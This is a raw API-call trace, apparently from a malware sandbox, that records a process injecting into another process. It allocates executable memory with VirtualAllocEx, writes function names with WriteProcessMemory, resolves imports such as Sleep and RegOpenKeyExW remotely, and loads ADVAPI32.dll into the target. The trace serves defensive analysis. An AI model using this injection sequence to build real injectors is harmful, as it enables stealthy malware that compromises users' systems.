	[0153.806] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.806] ResetEvent (hEvent=0x268) returned 1
	[0153.806] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.806] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.806] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.807] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.807] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.807] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004050, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.807] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.807] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.807] lstrlenA (lpString="GetCurrentThreadId") returned 18
	[0153.807] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.807] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0536*, nSize=0x13, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0536*, lpNumberOfBytesWritten=0x12857c*=0x13) returned 1
	[0153.808] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.808] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.808] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.808] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.808] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.808] ResetEvent (hEvent=0x268) returned 1
	[0153.808] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.809] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.809] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.809] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.809] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.809] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004054, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.810] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.810] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.810] lstrlenA (lpString="GetTickCount") returned 12
	[0153.810] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.810] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d0526*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d0526*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0153.810] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.810] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.810] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.810] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.811] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.811] ResetEvent (hEvent=0x268) returned 1
	[0153.811] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.812] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.812] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.812] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.812] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.812] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004058, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.812] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.812] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.813] lstrlenA (lpString="QueryPerformanceCounter") returned 23
	[0153.813] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.813] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d050c*, nSize=0x18, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d050c*, lpNumberOfBytesWritten=0x12857c*=0x18) returned 1
	[0153.813] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.813] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.813] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.813] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.814] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.814] ResetEvent (hEvent=0x268) returned 1
	[0153.814] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.814] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.814] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.814] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.814] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.814] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x1000405c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.815] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.815] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.815] lstrlenA (lpString="InterlockedCompareExchange") returned 26
	[0153.815] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.815] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d04ee*, nSize=0x1b, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d04ee*, lpNumberOfBytesWritten=0x12857c*=0x1b) returned 1
	[0153.815] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.815] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.815] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.816] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.816] ResetEvent (hEvent=0x268) returned 1
	[0153.816] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.817] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.817] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.817] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.817] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.817] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004060, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.817] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.817] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.817] lstrlenA (lpString="Sleep") returned 5
	[0153.817] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.818] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d04e6*, nSize=0x6, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d04e6*, lpNumberOfBytesWritten=0x12857c*=0x6) returned 1
	[0153.818] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.818] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.818] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.818] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.818] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.819] ResetEvent (hEvent=0x268) returned 1
	[0153.819] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.819] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.819] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.819] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.819] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.819] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004064, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.819] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.820] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.820] lstrlenA (lpString="InterlockedExchange") returned 19
	[0153.820] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.820] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d04d0*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d04d0*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0153.820] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.820] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.820] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.820] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.821] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.821] ResetEvent (hEvent=0x268) returned 1
	[0153.821] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.821] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.821] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.821] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.821] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.821] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004068, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.822] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.822] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.822] lstrlenA (lpString="SetUnhandledExceptionFilter") returned 27
	[0153.822] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.822] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d05c0*, nSize=0x1c, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d05c0*, lpNumberOfBytesWritten=0x12857c*=0x1c) returned 1
	[0153.822] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.822] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.822] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.822] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.823] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.823] ResetEvent (hEvent=0x268) returned 1
	[0153.823] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.823] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.823] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.823] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.823] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.823] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x1000406c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.824] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.824] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0153.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d034c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0153.824] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23079d8
	[0153.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26d034c, cbMultiByte=-1, lpWideCharStr=0x23079d8, cchWideChar=13 | out: lpWideCharStr="ADVAPI32.dll") returned 13
	[0153.824] lstrlenW (lpString="ADVAPI32.dll") returned 12
	[0153.824] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.824] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x23079d8*, nSize=0x1a, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x23079d8*, lpNumberOfBytesWritten=0x12857c*=0x1a) returned 1
	[0153.824] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x128500 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x128500*=0x70) returned 1
	[0153.825] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.825] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.825] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0xc, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f8*=0xc) returned 1
	[0153.825] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520*, nSize=0x70, lpNumberOfBytesWritten=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesWritten=0x1284f8*=0x70) returned 1
	[0153.825] ResetEvent (hEvent=0x268) returned 1
	[0153.825] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.827] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x128520, nSize=0x70, lpNumberOfBytesRead=0x1284f8 | out: lpBuffer=0x128520*, lpNumberOfBytesRead=0x1284f8*=0x70) returned 1
	[0153.827] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.827] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.827] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.827] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23079d8) returned 1
	[0153.827] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.827] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.827] lstrlenA (lpString="RegEnumKeyExW") returned 13
	[0153.827] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.827] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d032a*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d032a*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0153.828] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.828] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.828] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.828] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.828] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.828] ResetEvent (hEvent=0x268) returned 1
	[0153.828] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.829] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.829] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.829] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.829] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.829] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x10004000, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0153.829] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0153.829] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0153.829] lstrlenA (lpString="RegOpenKeyExW") returned 13
	[0153.829] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0153.830] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x20000, lpBuffer=0x26d031a*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0x26d031a*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0153.830] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0153.830] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff0c0
	[0153.830] VirtualAllocEx (hProcess=0x454, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0153.830] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0xe0000, lpBuffer=0x22ff0c0*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ff0c0*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0153.830] WriteProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0153.831] ResetEvent (hEvent=0x268) returned 1
	[0153.831] SignalObjectAndWait (hObjectToSignal=0x458, hObjectToWaitOn=0x268, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0153.831] ReadProcessMemory (in: hProcess=0x454, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0153.831] VirtualFreeEx (hProcess=0x454, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0153.831] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff0c0) returned 1
	[0153.831] VirtualFreeEx (hProcess=0x454, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
